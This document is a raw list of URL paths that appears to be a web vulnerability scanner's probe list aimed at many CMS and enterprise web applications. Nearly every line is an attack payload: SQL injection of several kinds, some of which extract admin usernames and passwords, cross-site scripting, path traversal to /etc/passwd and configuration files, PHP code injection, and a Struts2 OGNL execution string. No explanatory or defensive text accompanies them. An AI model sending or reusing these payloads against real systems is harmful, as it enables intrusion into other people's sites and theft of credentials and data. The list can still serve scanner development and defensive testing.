/epp/html/nodes/upload/supdoc.jsp?pkcorp=1'%20AND%204310=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(106)%7C%7CCHR(109)%7C%7C(SELECT%20(CASE%20WHEN%20(4310=4310)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(113)%7C%7CCHR(111)%7C%7CCHR(58)%7C%7CCHR(109)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'HdRC'='HdRC
/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
/etc/passwd
/examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
/example/
/examples/
/extras/curltest.php?url=file://curltest.php
/faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
/favicon.ico
/fbyg/a476%20or%20updatexml(1,concat(0x7e,(md5(0x4124))),0)--%20-.html
/fckeditor/
/fckeditor/editor/dialog/fck_about.html/fckeditor/editor/dialog/fck_about.html
/feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
/feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
/feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
/filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
/filemanage/file_memo.aspx?file_id=(select%20char(109))
/files/
/findPortalNewsBycategoryIdAndTopPortalNewsAction.action?bg=background6&categoryId=jms-11&displayMode=wordList&from=index&num=8&picHight=&picWidth=&proportionVal=1&showDate=0&showMore=0&showTitle=0&siteId=../WEB-INF/web.xml%3f&wordSize=
/flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
/forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
/forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
/forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
/forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
/frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
/gallery--p,0,1122%20and%200-0---1.html
/general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
/general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
/general/info/view?kind=0&i9999=-1%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/general/info/view?kind=6&dbpre=k00%20where%201=2%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
/getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
/getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
/ggxxlb.aspx?mc=&xh=&qx=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(103)%7C%7CCHR(101)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%20233%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(86)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&lx=&lxdm=1
/ggxxlb.aspx?mc=&xh=&qx=1&lx=&lxdm=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(103)%7C%7CCHR(101)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%20233%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
/goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
/grad/admin/domain_logo.php
/group/group.php?id=1%27webscan_draGxn
/group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
/guanli/
/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
/guestbook_reply.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php?ID=-1'%20UNION%20SELECT%201,2,3,4,md5(0x045154),6,7,8%23
/hetong/3121436149178/a448%20or%20updatexml(1,concat(0x7e,(md5(0x4124))),0)--%20-.html
/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--
/hlp/help.asp?HlpCode=1%27%20AND%208716%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2bCHAR%28106%29%2bCHAR%28112%29%2bCHAR%28120%29%2bCHAR%28113%29%2b%28SELECT%20%28CASE%20WHEN%20%288716%3D8716%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%28113%29%2bCHAR%28106%29%2bCHAR%28106%29%2bCHAR%2898%29%2bCHAR%28113%29%29%29%20AND%20%27sVMm%27%3D%27sVMm
/hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
/home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
/home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
/house/ProcManage/WebHouse/HousePic.aspx
/houtai/
/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml
/htdocs/
/html/
/huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
/i/dbmgr/resourcebrowser.do?action=download&file=../conf/jdbc.conf
/i/dbmgr/resourcebrowser.do?action=downloadquery&file=../conf/jdbc.conf
/i/oem/gdyjgrplogin.jsp?opid=1&taskGroup=0&id=%00'%20AND%201398%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281398%3D1398%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27HsUO%27%3D%27HsUO
/icons/
/icons/index
/icons/small/
/icons/small/index
/ids/admin/debug/fv.jsp?f=/../../../../../../../../etc/passwd
/img/
/inc/
/inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
/inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
/inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
/include/
/include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
/include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
/include/config.properties
/include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201
/include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201
/include/interface/uidata.php
/include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
/include/thumb.php?x=1&y=/../../../config&dir=config_db.php
/include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
/index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/index.html#/dashboard/file/logstash.json
/index.jsp
/index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
/index.php/?Itemid=11&option=com_search&searchword=%f6%22%20onmouseover%3dprompt(3312)%20//&task=search
/index.php/Index/index/name/$%7B@print(md5(1122))%7D
/index.php/Site/article/id/-5724)%20UNION%20ALL%20SELECT%2011,11,11,0x63656461723A66696E643A696969696969,11,11,11,11,11,11,11,11,11%23.html
/index.php/Site/listTpl/id/-7266)%20UNION%20ALL%20SELECT%200x63656461723A66696E643A696969696969,NULL,NULL,NULL%23.html
/index.php/Site/page/id/-7266)%20UNION%20ALL%20SELECT%200x63656461723A66696E643A696969696969,NULL,NULL,NULL%23.html
/index.php/abc-abc-abc-$%7B@exit(md5(118741911))%7D/
/index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
/index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
/index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
/index.php/weblinks-categories?id=just_test
/index.php?-dauto_prepend_file%3d/etc/passwd+-n
/index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
/index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
/index.php?a=list_type&c=index&m=link&siteid=1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%23
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?ac=order&at=list
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/index.php?ac=search&at=taglist&tagkey=a%2527
/index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
/index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
/index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
/index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
/index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
/index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
/index.php?app=/../robots.txt%00
/index.php?app=user&ac=../../../robots.txt%00
/index.php?app=user&ac=plugin&in=../../robots.txt%00
/index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23
/index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
/index.php?c=ajax&a=member_login&template=../../ooxx.php
/index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
/index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
/index.php?c=buylist&a=dellist&id=1%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
/index.php?c=tj&f=include&js=/../../config.php
/index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
/index.php?caid=1&ccid12=12&fsale=$%7B@print(md5(1122))%7D
/index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
/index.php?case=archive&act=orders
/index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
/index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECT@typeid,2,3,concat(0x7e,md5(1122),0x7e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_archive%20ORDER%20BY%201%23]=10
/index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
/index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
/index.php?case=tag&act=show&tag=%2522%20union%20select%200x2D3120756E696F6E2073656C65637420312C307833313239323037353645363936463645323037333635364336353633373432303331324333323243333332433644363433353238333533353332333233313331333233323239324333353243333632433337324333383243333932433331333032433331333132433331333232433331333332433331333432433331333532433331333632433331333732433331333832433331333932433332333032433332333132433332333232433332333332433332333432433332333532433332333632433332333732433332333832433332333932433333333032433333333132433333333232433333333332433333333432433333333532433333333632433333333732433333333832433333333932433334333032433334333132433334333232433334333332433334333432433334333532433334333632433334333732433334333832433334333932433335333032433335333132433335333232433335333332433335333432433335333532433335333632433335333732433335333832303636373236463644323036333644373336353631373337393546373537333635373232332C332D2D,2%23
/index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
/index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
/index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
/index.php?ctl=deals&k=pp%25%27%29and%20extractvalue%281%2Cconcat%280x5c%2Cmd5%280x7765627363616e%29%29%29%23
/index.php?ctl=help&act=term%27%20and%20extractvalue%281%2Cconcat%280x5c%2Cmd5%280x7765627363616e%29%29%29%23
/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
/index.php?id=-1%7C%7C1%20group%20by%20mid(md5(1122)%20from%20rand()*10%20for%2030)having%20min(1)%23&mod=compare
/index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
/index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
/index.php?keywords=zzz333&mod=search
/index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
/index.php?m=Ajax&a=gettypeattr&type_id=1%27%20AND%20%28SELECT%201%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x7765627363616e%29%2CFLOOR%28RAND%280%29%2a2%29%29X%20FROM%20information_schema.tables%20GROUP%20BY%20X%29a%29%23
/index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
/index.php?m=Goods&a=showByUname&uname=%2527AND%20%28SELECT%201%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x7765627363616e%29%2CFLOOR%28RAND%280%29%2a2%29%29X%20FROM%20information_schema.tables%20GROUP%20BY%20X%29a%29%23
/index.php?m=Goods&a=showcate&id=1'cfreer
/index.php?m=Order&a=index
/index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
